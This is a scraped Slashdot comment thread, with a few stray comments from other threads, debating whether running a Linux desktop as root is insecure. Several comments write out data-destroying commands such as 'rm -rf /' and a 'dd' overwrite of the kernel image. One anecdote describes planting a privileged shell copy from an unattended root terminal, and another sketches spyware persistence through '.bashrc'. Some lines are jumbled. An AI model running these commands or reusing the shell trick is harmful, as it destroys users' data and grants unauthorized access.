Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
That's right, the time has come for all those who are willfully ignorant and cognitively challenged to stand up and tell those know-it-alls, "I'm not going to take it anymore!" If you're a lawyer, CEO, advertising exec, accountant, fifty year old receptionist, psychologist, middle manager, celebrity, or an elementary school teacher, and you're sick of being pushed around by underlings just because they happen to have a clue, it's time for you to join an organization that understands your special status in society and your immunity from conscious, rational thought. Call 1-800-ASSHOLE and ask for a copy of the pamphlet, "The Power of Claiming You Know What the Hell You're Talking About When you Clearly Aren't" and ask about membership in Militant Idiots United. Thank you.
I think that the target audience for Linspire is the average Windows user who sees no problem running everything as root.
Coder's Stone: The programming language quick ref for iPad
From time to time I help my grandmother and my girlfriend's aunt out with their windows boxes. Both of them are pretty clueless as far as computers go, and I suspect that they could really get into running as a user and not as root. Especially when they were first getting started, and even now, they both have expressed a fear of fucking up their computers. If I/this guy could tell them why it's in their benefit, ie that as long as they don't enter the root password, they can do whatever they want and they never ever will have to worry about their computer breaking, I would imagine both of them would sign up really quickly.
The solution here isn't in dumbing things down. It's in giving a 1 minute presentation about the *nix security philosophy during the first login. I would think that most people, and ESPECIALLY newbies, would get behind that type of security if this guy would take 30 seconds to explain what it is and why it HELPS them instead of just portraying it as a nusience. In many ways, logging in as a user really does give you a freedom to explore and learn pretty risk free. People know that there are ways to break their computers. Telling them to go ahead and press any button you want to; if it's a button that will do something serious, it will make you enter a password would probably be attractive to most people learning an unfamiliar OS for the first time.
exceptio probat regulam in casibus non exceptis
Corporations have often built functionality around ActiveX. They need to migrate existing functions to the new products they are trialing or integrating into their systems. Not everyone can do a straight cut over you know.
XML is like violence. If it doesn't solve the problem, use more.
I would like to point out that with a bit of effort, unix protections can protect a user's data as well. For example, in web-directories, grant the HTTP user only read access to the files. Database files (at least for Oracle and PostgreSQL) don't need to be accesible to the users at all. Chroot offers further levels of protection.
For example, I run a web-server with an "apache" user. The user is chrooted, and there is no rm command available to apache, the logs are just pipes, and they point out to a mount point apache can't directly access. The only files available to poor apache are the program files and the files in the web-root. An attacker could work for days, and end up with access to exactly what the web-server was exposing in the first place. Compare that to running apache as root with a few badly-written CGI scripts (third-party, naturally!) to be exploited!
Ideally, the system would suspend the application while the user received a descriptive message of what the program was trying to do, at a high level. The administrator could then configure the app by running it with no privileges initially, but clicking "Allow Always" for each allowed operation, exercising each feature of the program that the users need, then capture that configuration and apply it to all users.
Users could (if allowed by their own account) also grant privileges (up to what their account had) for functions the system admin may have neglected to exercise. However, they would probably soon get annoyed by clicking dialogs and ignore what they said, so admins would in that case do well to make sure the user had few privileges and the app was already preconfigured properly.
Life's a lot like money-- you spend it, then it's gone. Spend wisely.
The "force" option is the worst thing to happen to Windows security, EVER. 99% of the time, you're asking the user to say "Yes, I'm sure I want to do what I just fucking told you to do." The other 1% of the time, you're asking the user to say "Yes, I want to be rooted."
For instance, what user actually reads and understands the SSH warnings about host keys? Hardly anyone.
Probably 60% of users just type "Yes" right away. These are the people who would just click "OK" to dialogs that say "Do you want to allow hardcorepr0nspyware.com to install software on your machine?"
Probably another 20% actually read it, decide that they don't understand what it's saying, and type "No", because they don't like to agree to things they don't know about. These are the kinds of people who say "No" to the browser warnings about sending information over the internet. You know the kind -- they come up whenever you type a search query into Google.
The other 10% actually go read the docs to understand the message. Actually, 10% is a bit over-optimistic, but we're talking about ssh, after all.
The same thing has happened to legal licenses. Since we aren't all lawyers and software engineers, we generally click through warnings from software and click/sign licences without a second thought.
Creative Commons has a good start on the legal front, and the shell is a good start on the software front. When we design any system, we should only force interactivity where it's absolutely needed, and explain it SIMPLY to the user.
Don't thank God, thank a doctor!
Does this by default.
*ducks*
rm -rf / usr/local/src/myjunk
Then there's the one where you put a file with the same name as a system command in a user directory....
I'm afraid that some of us who are old enough to rmember why we learned not to run as root are old enough that we're starting to forget things.
cd /
rm -r *
Those who have experienced such a thing can't post on Slashdot. Let's face it: Slashdot is biased against the dead.
...for a younger sibling/child to wander up to your box and type: dd if=/dev/null of=/boot/vmlinuz In seriousness though, he almost makes a good point by saying that anyone compromising the account has access to whatever's in your $HOME anyway... but surely anyone would realise that it doesn't mean you can just give away access to the rest of the system as well?! It's almost like inviting people to start installing rootkits and suchlike...
The guy's not a techie. QED.
Root has full authority over the system. Root programs that are exploited also do.
The idea was/is to make it impossible for a user to become root without going through the proper mechanisms. (su, setuid, group wheel, etc...)
In the OLD SCHOOL days it was an open challenge to see if a user account (student account) could even crash the system or get root access. Few would succeed. This was then there would only be 1 or maybe 2 computers on the whole school campus. Pre-networking days.
Something us SVR4 and BSD folks understood, but the many Linux guys totaly miss the point of why we do things a certain way.
So if a user account or program is comprimized is like on a ship with water tight bulk heads and steel hatches that lock shut, preventing the whole ship from flooding and sinking.
If a user account become compromized, as root you can still get in and fix it, completely!
If root is compromized, you probably can even get in, or tell if you've been compromized. This is really bad when you don't have physical access to the BOX. Like when it's 10,000 miles away. ( I have actualy been on boxes, as a hacker as well as root, when my adversary was on at the same time )
In a partly compromized box, as the hacker that had gained a user account, one can not fix up logs (*to cover ones tracks*), is restricted to IP port services above 1000. (this is why we use 8080). Can not add NEW IP address, send Raw packets (spoofing), or sniff the network.
They can not alter other users account. So if a web CGI get compromized they can't tag the SITE!!.
I can go on and on, but I hope you get the point. Root and USER accounts exist for some very good reasons. Layered security.
But it only works when you make your OS correctly. ( see FreeBSD, or OpenBSD for an example )
I am always doing that which I can not do, in order that I may learn how to do it. - Pablo Picasso
Root vs. non-root doesn't matter! Data is king (and it's in a non-root account) and everything else can be re-installed. Additionally, if you back things up, your data is safe -- at least from being lost. In the end, your privacy is all that is at risk -- and that resides in a non-root account.
Silly Linux boys...
In order to make it easier on the users (ie no passwords and such when installing new software) why not do the following:
Instead of running the user as root and allowing them to install any god forsaken program there is why not give them a regular account. Then when the user wants to install something they click on it and the Linspire package managing software connects to a Linspire database where the program is checked against a white list. If the program isn't on the white list tell the user that the program can't be installed because it is most likely a virus or spyware. Then give the user a help number to call if they still really want to install it and let people help them out.
Now, if the program is OK to install Linspire queries it's user database for your products root password and then fills it in and viola, the program installs.
A shortcoming is that you might not be connected to the Internet, but, IMO, it's pretty safe to assume that someone buying a new computer is going to have Internet access as well. Just a thought.
Obligatory FUD debunk, or just helping a troll.
You have been trolled.
And way to blame the fact that YHBT on Bill Gates. That makes a lot of sense.
Once on a Solaris 2.6 box rented at a high price by my employer for me to port it's product to this OS. I wanted to remove the file sI had used to install something so I just typed "rm -rf *", after a few seconds, I realized that there were line sof text scrolling on the screen saying that it wasn't able to delete /dev/*something* and by the time I had killed the process, the system was no longer usable. I had to spend four or five hours rebuilding the deleted parts after booting for a CD.
Using root is not a problem in itself, it just makes the problems related to your mistakes far far worse.
I just gave it a shot (FC3) and it won't let me browse /home/bob/ if /home/ is chmod a-x, even if /home/bob/ is chmod a+x.
Even typing "cd ~" as a normal user gives me "-bash: cd: home: Permission denied".
Dlugar
Computer Go: Writing Software to Play the Ancient Game of Go
Yes, it's a bit less convenient, and it may be a hassle to put on, and maybe your passanger needs to reach something so they unbuckle themselves for a minute... but it can be the difference between Bad Stuff and Really, Really Bad Stuff.
The World Wide Web is dying. Soon, we shall have only the Internet.
Or the only way to be sure that my firewall blocks all nasty stuff that I might run locally (Ohh, annakounikova.exe!) is to run as non-root? If I run as root, a malicious script can change the firewall rules, and compromise my data (I mean, let someone else than me have access to it remotely.)
Yeah, sure, whether I run as root or not, a malicious script can destroy my data, but I have backup, and if my firewall is set correctly, I won't have it stolen.
Now, if the firewall is on another machine, well yeah, running as root or non root makes no difference (for a single user machine).
perception is reality
Look, here's the bottom line as far as running as root. If my grandma is using her computer, and she can't run the programs that she wants to, she gets aggrivated, and if it doesn't work she will most likely give it up. And there is one less user. Sure, it is definitely much better to run as a normal user, but if the software DOESN'T WORK, it really is pointless. If the O/S can be intelligent enough to consistently ask for a password in an intelligent manner, then perhaps it would be acceptable to the normal user. However my experience in both linux and in windows that, for many programs it just doesn't ask, and then proceeds to not work. And to top it off, the root/Administrator accounts should have a secure password, and as such, are usually long, and difficult for the average user to remember, and if nothing else they are a complete pain. Sure, I don't run my Linux box as root, but I do run my windows machine as admin, because simply put MANY, MANY programs REQUIRE that in order to work properly. Is it right? No. But that is how it is for the moment. I definitely agree that it needs to change, but you have to realize that the average ex-windows user has NO clue what root is, and doesn't want to be bothered with a password prompt every time he wants to change his background.
I dont' think ANYONE understands what ActiveX is, least of all, the programmers at Microsoft.
Correction:
/home/, and user bob executing rm -rf /home/ fails to eliminate a bob-owned /home/bob/, as it fails to get a listing of /home/
replace "executable" with "readable"
chmod a-r
From the article:"I DO see it's an added pain in the ass when grandma tries to change her wallpaper, and it tells her "you don't have root privileges"
No, I don't think Grandma should learn about priviliges to change the desktop wallpaper, you elitist grandma-hater!
Michael Robertson isn't very "linspiring" as a CEO of a software company. He hasn't really thought this through, has he?
Let's think about the kinds of data that might exist on a computer:
The data you already have
The OS, application programs and configuration
Other peoples data
Data you may create in the future
Running a vulnerable program as a user exposes the data you already have to damage, so only one of the four categories is at risk. But running it as root means that all your system setup and any other programs also cop it. And even better trojans and rootkits can be installed on your system so all your future data is also vulnerable.
If I'm going to have a disaster I'd prefer it to just screw me over once rather than make my entire life a misery.
I dare you to try this. Dare.
Not that I've tried it recently, but I think I did this a year or so ago (by accident) as non-root. I didn't lose any data whatsoever, since so many error messages began to get printed I hit Ctrl-C before it ever got to /home. So yeah, I heaved a huge sigh of relief.
Or maybe that was just a weird dream.
the article mentions Grandma wanting to change desktop wallpaper. She is not going to know anymore about the attack if she's root or non-root. I think that is true for the vast majority of desktop users, who are lucky if they even know someone who can use that information. They also never run MySQL, do rm -Rf /, or any of the other things mentioned in the original post. duh!
"I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer.
PRINCIPLE OF LEAST PRIVILEGE
One word: Spyware
.bashrc. Same goes for software that turns the computer in a spam-spewing zombie.
Where is the problem in creating spyware that runs as user? Simply write the binary as dot-file to the home directory and append a call to
He does have a good point. The separation of root and user on single user machines is greatly overrated. It would only make a minor difference if a root-only software firewall were to block some outgoing connections, e.g. SMTP. But as is, the damage root can do is only slightly more than the damage a user can do - not to mention that root exploits are not uncommon.
The only good reason to run as root:
1) Your name is root and you're very surprised Linux was able to figure that out without you telling it.
2) Your s,u, and d keys are broken.
For all the talk about it, I don't think I've ever actually known anyone to do the classic accidental rm -Rf / as root.
I see about one disaster a month where a user toasts their own files. Over the years I've seen three servers destroyed by an admin doing an rm -rf . in the wrong directory (and heard a number more). I've heard second-hand of a million-dollar typo of someone on an admin server with a whole division's NFS directories mounted root-writable.
Statistically, I've concluded that any given person, regardless of intellegence, has a slightly more than one-in-a-million chance per day of doing a potentially machine-toasting typo.
Do you know how incredibly easy it is to have a Windows system infected?
You know, I've been running Windows systems for thirteen years now, and DOS ones for five years before that, without a single virus, worm, trojan, spyware, or other infection. So my answer is, "it's not easy at all if you have a clue."
Which, apparently, your friends and relatives don't have. They've been running IE and OE, I assume. They haven't had a hardware firewall between themselves and any IP connections, either. And they've run files they've downloaded or borrowed on a disk or found attached to their email without first having Norton or MacAfee look at them.
So, my question, is it that they've ignored your warnings, or is it that you haven't given them the necessary clue?
The reason Linux will never have the same problem with spyware, trojans and worms is because of most distros setting up the main account as a normal user, not root. So, once linux gets more popular and hackers start writing more tools to hack linux boxes, guess who the much easier target will be... people running Lindows.
See, your rant was blown out of the water... you are just plain wrong.
Meh.
I can understand the confusion, but the full rule is: Don't use root for normal use drunk.
My one-time boss did. He typed rm -rf /tmp/somedir, except his thumb accidentally bumped the space bar after the first slash and he didn't notice until after pressing return.
After that, I got the job of sysadmin...
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
+5: The Only Post This Story Will Ever Need
if such a mod exists...
Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.
I would like to say I never had to be root to change my wallpaper
Also - it is about data - if you have root privileges you can view everybodies data on the computer.
That is not good - I think he is still living the the microsoft windows 95 world when there was no network and the pc was just that a PERSONAL computer. Today it is mutlfunctional device that needs privilage escalation and descalation.
Way back when I was a high school student, the "system admin" at my school used to log in to the school's mail server as root and just leave his terminal window hanging open. One day I had somebody else distract him while I walked into his office, copied /bin/tcsh to my home directory, set the sticky bit on it, and left. Oh, the fun we had after that!
Of course, he didn't learn...
Posted from the wireless couch.
fat finger something like:
/var/log/*.gz
rm -rf
and turn it into:
rm -rf / var/log/*.gz
and you'll quickly find out why root is not to be used all the time.
Why read the article when I can just make up a snap judgement?
I SAID that sudo can do that. But Linux by default doesn't ship with that as "how you make yourself an admin user"
Except Ubuntu apparently does, which rocks and I just didn't know. Hopefully this is the start of a trend - a trend I'm trying to push along a little bit.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
The strength of security levels that is provided by file permissions and non-root access shine forth in heavily multi-user environments for which unix was designed.
When many people use the same system, we usually want to give them means to protect themsleves from each other, and the system administrator wants to protect the base system from the users. The idea is to make your environment safe from other users with legitimate access to the system.
Single user machines found in most homes need only protect the user's data. As mentioned in other posts, the system really isn't all that importart--it's not a server system whose uptime is critical; if it breaks, pop in the install disk and fix it. What's really important are the person's files, which they themselves already have unrestricted access to. When security for their account is compromised by sneaky means, the data is vulnerable whether they are root or not.
In any case the user always has the risk of contracting spyware or file damage, but non-root usage helps ensure that one user compromising himself has the least potential for leading to the compromise of other user accounts. If Billy Bob runs the wrong script, he may have to suffer data loss or theft, but the other users can breath easy because he is not root.
On a home system, however, there is only Billy Bob, and there is nobody else for him to be protecting. If he runs as root, he seems no worse off than he was before.
Seriously, how can the CEO of a Linux-oriented company say something like this. He's either:
a) managed to avoid listening to his engineers,
b) got them cowed into telling him only what he wants to hear, or
c) he's found the most clueless engineers on the planet to work for him (did he hire people from Microsoft, or what?).
I think he's hearing rumors that people are criticizing Linspire for running as root and they are thinking about changing that, but honestly can't figure out why it's better to not run as root. He wants a list of reasons for the marketing of their new "secure" version of Linspire.
Well, I for one am not helping with this, he can do his own homework, I'm not letting him copy mine.
After having run Mac OS Classic for since 1992 - and always on Powerbooks - until Jaguar, I have to say, Hey, I ran my own machine! I could do anything I wanted with it! It was my responsiblity!
I understand the power of Root, but as writer who works on her very own Powerbook, I am Up To Here with permissions. They have no meaning in my life whatsover, except as the constant price I do pay for using OS X.
What you have here, fellas, is - gasp - only a Point of View. Mere mortals have been in charge of their own machines, free to run riot through the OS thereupon. The world has not ended.
Have a point of view, but for god's sake, know so. I don't screw around with the 'nix underpinnings (much) . . but it is my computer.
Apple fucked up PNG support too. I've just spent the last three hours dealing with this major annoyance. The humorous upshot: I had already frozen the blended layers to each other so the png-pointing style sheet goes to IE and I had to make a special jpg-based one for safari. Sheesh!
grammar-lesson free since 1999. (rescinded - 2005)
Running as root is unsafe GENERALLY.
However, there are two scenarios that lessen this vulnerability tenfold
1) with a strong enough root password, 128 characters, mixed case alphaneumeric for example, it would take either a GOD or a supercomputer hundreds of thousands of hours to break into your system, assuming your "normal" user accounts are set up similarly.
2) assuming the above is true, WHO THE FUCK IS GOING TO EXPLOIT THE PROVERBIAL "vulnabilities/exploits".
You guys are a bunch of fucking n00bs. get a life for fuck sakes.
That's the best way I've seen that said yet, and I'll add that there are many adults for whom it's just as dangerous, whether it's linux or windows.
Robertson is talking out of his ass.
SB
It's old. The more humans I meet, the more I like my cats. At least they are honest.
Ignoring it and hoping it goes away is not the right answer, either
It is for me. I use Macs and Linux. If someone wants to make money from me through my web browser, they had damned well better do it using technology I can use. I won't be your customer unless you support my platforms of choice.
I used to be a web developer. If one of our clients wanted some fancy single-platform buzzword technology just because they thought it was cool, we'd ask them if they'd rather be "cool" or reach 5% more customers. Guess which one they all chose?
If the X% of people use Mozilla, then that's all the more incentive to develop sites that work in Mozilla. I do not want anything to remove that benefit.
I *am* root.
Firstly: That is a reason for others to discourage the use of root. That is not a reason for me, as a user, to not run as root. I am talking in terms of what the user cares about. There is no reason for the USER to be concerned about that.
Secondly: That is also more an argument for external firewalls. You should never have your network protected only by rules on the box you're trying to protect.
Thirdly: spammers don't require root. Specific spammers require root for specific transport methods due to specific outdated conventions which make no sense at all in a desktop environment.
The thoughts themselves:
Sure, you dont want someone to gain root access, but you don't actually want them to have any access at all. If due to a convention that you've compiled in, blocking root access means making a handful of specific exploits not be able to work once you've already been infected, that's not really such a great thing to shoot for- You're still just as infected, and the infection is what you (as a user) want to avoid. Who cares about the effect (as a user, not as a peer of the infected)?
You're still just as fucked if someone gains access as non-root, even if a handful of people wont be interested. Hey, if I compiled in an option that said you needed to be logged in as micheal in order to access the ports I use for DCC send, I could block anything which uses those from being useful after I'm infected.. and if I block the ports I use for printing if you're not logged in as bixbie... and for mysql if you're not logged in as bilbzerobaggins...
-- 'The' Lord and Master Bitman On High, Master Of All
But you fail to see that those developers won't develop using FireFox, they'll just keep using Internet Explorer, as it clearly satisfies their needs. Those same developers also won't develop ActiveX for FireFox, because they won't see why they should do this.
XML is like violence. If it doesn't solve the problem, use more.
as per this comment below (just bringing it up to make it more obvious). chmod a-x /home keeps you from doing anything in /home or any subdirectory, but will let you list /home; chmod a-r /home keeps you from listing /home but will let you do stuff in /home/bob.
Michael Robertson is the king of bad ideas that don't generate any revenue. Linspire has a zero chance of creating any resonable revenue just like Robertson's MP3.com Robertson simply laughs all the way to the bank as his stocks are overvalued and he somehow convinces idiots to give him millions of dollars of seed money.
I've seen people do an rm -rf * in / when they THOUGHT they were chrooted in a safe directory. As it turned out, they had forgotten they were not.
/etc
I've also seen that happen with scripts that had a lot of sed and awk in them and that basically had a few bugs in their regular expression implementations that caused a lot more to be removed than was necessary.
I've also seen that happen with people who are too impatient when entering commands...they don't enter the entire wildcard expression and end up taking out whole chunks of the file system like
Find a job you like and you will never work a day in your life.
- Any process that is owned by a given user has all the authority that that user could have
- Some executables allow a process to start other processes with root access. If there's an overflow in any of the numerous suid binaries, any process can use it to escalate.
- The most dangerous operations, such as processing network data, require root privileges. I still think that "must be root to bind ports < 1024" is the #1 Unix/Linux security bug and we've been suffering with it for three decades.
- There is a user (root) which can access everything in the system. There's no way to grant a program the capability to listen to port 80 without also granting it the capability to write raw blocks on the disk, access raw devices, access other users' files, etc. This is an absolute disaster. No ordinary web server needs the ability to write raw disk blocks, so it shouldn't have the capability to do it.
So yeah, the Unix/Linux security model is such a disaster that he's right! On a single-user machine (such as a typical Linspire machine) the user isn't really any worse off running everything as root.What would be nice is if someone would actually fix the Unix/Linux security model one of these decades.
I'm sure a lot of Unix old hands (perhaps complete with beards!) will dismiss what I'm saying as rubbish, but I also believe that just being an old Unixer doesn't give anyone any special understanding of security. The way to get a special understanding of security is to think about, and understand, some theory ideas like least-privilege, capabilities, compartmentalization, that kind of thing. All those are foreign to the traditional Unix world, which is based on users and permissions. The users-and-permissions model is the ROT-13 of security models.
I manage to use apt as a non-root user all the time, using sudo. Just like I do with every other package manager for every other unix OS I use. There is simply NO excuse to be running as root when sudo is so powerful and simple.
Hooray, I deleted the data in my home dir. Big deal, its backed up. It took a whole 8 minutes to restore. Somehow I think it would have taken me longer to reinstall my OS and all the applications I have installed. And if I hadn't been intentionally doing this just to see how long it takes to restore my data, I would have hit ctrl+c during the long period of "rm: blah: Permission denied" scrolling up the screen.
Actually, Robertson is right.
He said "why is it more secure to not run as root. Nobody really has a good answer. They say "oh, yeah, it is!", but it really isn't. Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well. "
Obviously he is talking about single user computers, as most PCs are. If you have a single user computer, when your user account is penetrated, your root account is penetrated next time you su.
The last step in a Linspire install, which apparently noone in this thread has done, is to set up user accounts for a multi-user system. If it is a single user system, there is NO additional security to setting up a user account.
My data is the most important thing for me. I can reinstall Linux in 15 minutes, but my data is irreplacable.
Peter
smash
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
It must be a happy happy place in Linspire-land.
"When I want your opinion, I'll give it to you." --leonstryker
This reminds me of back in the day when everybody bragged on Linux uptime vs. Windows. The *NIX snobs still don't get the desktop after all this time. As long as a desktop stays up all day, that's all that matters because desktop users treat their PCs like TVs. Yes, 1990s Windows desktops often failed that test, but Linux users back then were comparing CLIs to desktops and bragging on uptimes.
This root flap is the same sort of deal. Yeah, root can kill all the users on a box. Guess what? Granny is the only user on the box. If user Granny's files are dead, the whole box is dead as far as she's concerned, and if her kernel has been replaced by KERNEL.i0wn3du, she is just going to run the restore CD.
That's not to say that I agree whole-heartedly with the "root is safe" assertiong; but I understand where the guy is coming from. In a way the *NIXs are perhaps a victim of their own success in writing apps that are (usually) secure enough so that you can get away with running as root.
For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
Yes, your data may be deleted when you launch a nasty virus under your account, but when your 12 year old son is scouring the Internet for pr0n, your data is safe.
/' your links to the inodes are gone, not the data. Now if you were smart, you could just make an area available to the super user where all those indodes were hardlinked and could be restored. Of course there are ways around such things, like simply 'find | xargs tee', but at least there are other options available to secure files.
The OS can't be mangled. So even if you lose your data, at least you can still perform whatever functions you need to perform under a seperate user. Or the kid from next door can come over, log on as the super user, rescue all your documents and mp3s, delete you user and home directory, add your user back, then move the data back....then you might not lose your data or your ability to use your computer.
There are more options for data recovery. assuming a very annoying virus that just does 'rm -fR
Oh dear God now you've done it....
A better choice would have been binding a key on the local keyboard (a secure tty) to cause a root-privilege menu to come out over the current desktop (in such a way that no user-level window can obscure it).
Is it just me, or is one of his eyes blue and the other brown. Probably had a play in Photoshop. Creepy.
Those are for use by the press. E.g. there's something in a magazine about Linspire, so they pick up a press-quality picture and make a 2 cm x 1 cm box with the guy's face in the page.
Also, I'm convinced he has no clue. I will never go near "Linspire", ever. And I will not let anyone near me do the same.
What does ActiveX do that XPCOM and Java are incapable of performing?
:-)
I'll play devil's advocate here, and say the first thing that comes to mind: It can't run all those ActiveX applications that already exist. Companies invest money into programmers who will maintain or program existing software and infrastructure.
Maybe what's needed is an ActiveX type clone just to end this problem. Let's keep in mind that there are large numbers of IT workers who do not frequent this website regularly, and don't really care if XPCOM and Java are better - it still won't run the ActiveX applications they currently have.
There are large numbers of people who like having LESS work to do when they are at work. If they need to hunt down and replace all their internal ActiveX applications, that will simply make more work for them. Plus, their PHBs will always see this as just costing more money.
But, if this means swallowing some open source pride, and writing a GPL ActiveX clone just to edge out Microsoft elsewhere, then it's worth it. Of course it would never be installed by default, and of course there would be multiple pop-up windows telling you why this is a bad idea, but it should be available.
If the strategy is played correctly, we could start slowly moving companies over to more OSS solutions and away from ActiveX.
But, in the end, Compatibility is King, since your PHB sees this as a means of saving money in the short, and long-term. Anything that is seen as a non-drastic change to the infrastructure will always be regarded as a good thing as they view it as a means to save money. Think of all those computer "n00bs" who will still refuse to buy a Mac even though all their computer nerd friends tell them to buy one. (I have a PC - but I want my friends to start using Macs since I'm sick of fixing their PCs) But, I always hear the concern over compatibility, since they know not everything will work on a Mac. Yes, there are equivalent products, but they don't care since it won't run the "majority" of computer products already existing.
Am I completely wrong? Please tell me, I know someone here will anyway.
...for years (5 or more) without any problems and with Internet connection when the user is not an Admin-user...
Virus (wich involves any user activity) may be avoided or/and removed easily and so can Spyware...
If you want that behaviour you require the 'interactive' option. rm -r will not prompt for every action. unless you're on a RedHat box with rm aliased to "rm -i"
That alias was the worst thing RedHat ever did. It didn't protect anyone, it just made the avergae joe too familiar with the force option. I haven't used RedHat since version 8.0, but the first thing I used to do was delete that bloody alias in my
I suspect most people find the force option a long time before they find the alias, but by that time using -f has become entrenched.
Has netcraft confirmed this yet?
You will see computers that are just as "usable" as everyone keeps wanting. You'll be able to do all your things without thinking about a filesystem or files or anything like that. It'll work great...
But it'll be so restrictive that it won't qualify as a general purpose computer in your eyes. It'll be good for companies, who can sell you ten computers instead of one, but that's it. Some will buy them. You will, if they become cheap, but you'll keep your gp machine.
The elevator crack is also silly because an elevator goes up, down, and stays still. The operation can be more or less complex, but that's all it does. A computer is a canvas for a painter, a darkroom for a photographer, a pasteboard for a desktop publisher, a video editor, a storage device capabable of holding everything you have ever done or had the time to record or take a photo of, a typewriter for the novelist or a poet, a super fast and simple calculator for a child, a super fast and complex calculator for a scientist, a general purpose slave who has no complaints for a programmer, a spreadsheet for anyone running their own business or keeping track of their family finances, a limited tax attorney, a way of designing every physical thing from PVC pipes to rocket ships, and a robotic operator in charge of the construction of those things. It's a blazing testament to the will of man, a monument to tool use, and the best thing humanity has going for it since the opposable thumb.
And all of that was BEFORE the web!
It really is. Michael Robertson sees his Linspire Linux desktop as Linux for the masses. This is his number one priority over-riding all else. He probably knows, is probably well aware of every reason that it's inadvisable to run as root, and his technical staff are probably tearing their hair out now because they think he wasn't listening.
I think people here are misunderstanding his motives. Linspire is not a server distribution. It's not even marketed as a multi-user desktop distribution. Linspire is marketed as a single-user PC OS, with great multimedia capabilites. It's designed to appeal to the Windows users.
And if anything can break Microsoft's monopoly on the desktop it's what Linspire is trying to be; a freely distributable OS that matches and exceeds the functionality and user-friendliness of MS Windows.
Give the guy a break. It might not be our cup of tea, but so what? We don't have to use it. We have a choice, unlike the Windows users.
Bzzzzzt..."AAAAaaaaarrrgh!!!" Thud.
"XP has a super-root account which nobody but MS has access to"
:P) will accept the risks and run as root anyway. It's a conscious decision on my part, and I'm fully aware of the possible consequences. 'tis another reason why I'm muchos careful when running rm with -R...
So Microsoft left themselves a back door into *my* PC? This is exactly why the Blaster worm took off; because they left a back door entry into Remote Assistance.
Besides which, why the hell should they have a username on my machine? Why can't I utilise my PC to the utmost?
In any *NIX system root is GOD. There is very, very little that root can *not* do. Hence why it's very heavily recommended to use a seperate account for everday use, and just use su or sudo to install apps etc.
Some people (yes, me included. I hang my head in shame
Goten Xiao
He probably just doesn't have the code to run as a non-root user without requiring password. While his developers are working on it, he's blowing smoke and waving hands. "these are not the droids you are looking for" "who needs to run as non-root anyway". Meanwhile Windows is moving to a Least Priveleged User model, and for a good reason. I bet Linspire will shortly as well.
When one RTFA they will notice that Robertson is talking about a desktop system. Having users log in as some root/admin account is not a big deal because the only thing valuable on that system is the data stored as the only user on their system. Obviously he's not saying "run apache as root". In fact he implies it would be a very bad idea to allow things like a webserver to have write-access to a user's data!
Now if you are maintaining a multi-user system, root access is more powerful because it grants you full access to all user's information. Although these days a family computer has multiple accounts on it, Little Timmy and Mom's data is seperate. If Timmy downloads some malicious code in some new music sharing program that turns out to be a trojan, at least Mom's calendar, address book and tax information will be protected.
Of course I'd recommend periodic backups to give you real data security. That's perhaps more important than the root/non-root issue.
“Common sense is not so common.” — Voltaire
Not kind.
:
.tar.gz and .tar.bz2
You should have used test and test2 as a subdirectory
your script will delete *.tar in the current directory.
Well I don't have any anyway : only
only slightly different than rm -rf *
and way worse if you are running as root.
You do realize the user isn't actually running apt themselves right? The graphical application that they use currently does "install command", it just needs changed to do "sudo install command". Users will never see or notice the difference, the lindows knobs just have to do their job instead of the current cop-out of making linux into a single user system.
People, move along now, this is a jest from Robertson to get our attention and start up a yes-no debate.. fugeddabatit...
-if at first you don't succeed, stay the heck away from paragliding.
Obviously his answer is Market Force driven and non-technical. He ships as root, he doesn't want to sacrifice his products perception. He'll never say anything else.
Would you expect the CEO of Exxon to openly state that there is something called Global Warming and it is necessary for everyone to stop driving gasoline powered cars?
Certainly not until they have the answer. It maybe be the Linspire is working on changing this for real, but it won't be openly discussed.
hey kids, can you say:
FLAMEBAIT!
I know the hardcore geeks feel differently, that's fine.
The /. crowd seems to assume that everything is a server. Even if it's their home computer, it's got to run Apache, MySQL, Squid, a mail server, etc.
That is _not_ what Joe Average needs, however. For that matter, not what _I_ need.
I explicitly do _not_ want a web server, database server, or any other goddamn server on my desktop machine. I explicitly don't need one, and I explicitly don't want one using up my RAM and CPU cycles. I'm pretty sure mom and dad don't either.
So the whole "but what if someone uses a vulnerability in Apache?" is a moot point: they won't find Apache on my machine to start with.
Also the whole idea why it's called a _Personal_ Computer (PC) is that I don't need, nor want, a multi-user bonanza on it. It's not some server where every Tom, Dick and Harry has their own separate account and their own separate data.
The same, incidentally, applies to most family computers. Joe and Jill Average, and their 2.2 children, most of the time don't keep their files secret from each other. It's not like Jill's digital photos of trees and squirrels are some top secret.
So all that someone could exploit is some program _I_ am currently running, as _my_ user. Period. And then it can erase my data.
And that assessment is right: that's what's important on that system. The programs are the easy part: reinstalling the whole system and all the programs is a few hours exercise. Getting your own data back might not even be possible, short of having a time machine.
I.e., for Joe and Jill Average, with a _desktop_ machine (not a server), it really makes zero difference whether they run as root or as some other user.
A polar bear is a cartesian bear after a coordinate transform.
Bob runs his system as root, and Susie doesn't. Bob downloads something from the internet which (*gasp*) has a virus attached to it which *can* affect a Linux system. Bob infects his whole system. Susie, who downloads the same file, infects her user account. Running as a user reminds you that you are not in control of the system, and to be in control you have to enter a password. This usually makes people more wary about what they do and do not do as root.
Make sense?
"It's here, but no one wants it." - The Sugar Speaker
"bash$ rm -r /"
'nuff said
The average user wants to change computer setup for zxy piece of hardware doesn't want to bother with passwords. Hell what is the point of passwords anyway. Most passwords are easily cracked or sniffed. Dialogs / apps that need super user access to perform tasks and keep asking for higher privileges constantly just condition the user to enter the passwords automatically. If a popup in a browser asks the user for the root password I wouldn't mind betting that most uneducated users would quite happily enter it.
rm -rf *
DOHHHH!
While I do agree that the most important data is what is stored in the $HOME directory, running everything as root, puts the OTHER users at risk and not just yourself.
Some would say that this doesn't matter if you are a home user but even home users should (and often do) have different users for the different family members.
If the 13 year old kid downloads lots of 31337 warez and gets a worm thrown in with it, this shouldn't affect dads documents, budget, tax stuff and credit card information.
If you run each account as root, this is bound to happen sooner or later.
